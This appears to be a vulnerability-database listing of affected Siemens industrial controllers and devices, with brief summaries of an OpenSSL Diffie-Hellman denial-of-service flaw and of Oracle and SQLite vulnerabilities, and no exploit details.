Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
A vulnerability in the Diffie-Hellman Key Agreement Protocol in OpenSSL allows remote attackers to cause excessive server-side computational load by exploiting public key order validation with approved safe primes, addressed in updates fixing CVE-2023-50782 and CVE-2024-41996.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513R-1 PN (6ES7513-1RM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RM00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515R-2 PN (6ES7515-2RN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-3 PN (6ES7517-3HP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517H-4 PN (6ES7517-4HQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518HF-4 PN (6ES7518-4JT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK (6ES7518-4AP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1507S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S F V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S T V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S TF V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller CPU 1508S V4
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V2
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 Software Controller Linux V3
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-1500 TM MFP - GNU/Linux subsystem
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC S7-PLCSIM Advanced
|
vers:unknown/* |
Critical vulnerabilities in Oracle Communications Cloud Native Core Unified Data Repository and Oracle Siebel CRM Cloud Applications allow unauthenticated attackers full system compromise, while multiple SQLite-related flaws affect various products including NetApp and Apple software, causing memory corruption and integer truncation issues.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Siemens / Heliox Flex 180 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / Heliox Mobile DC 40 kW EV Charging Station
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / RUGGEDCOM APE1808
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SICAM SIAPP SDK
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIDIS Prime
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants)
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Industrial OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V3 CPUs - Windows OS
|
vers:unknown/* | ||
|
vers:unknown/*
Siemens / SIMATIC ET 200SP Open Controller CPU 1515SP PC3 (incl. SIPLUS variants) V2 CPUs - Windows OS
|
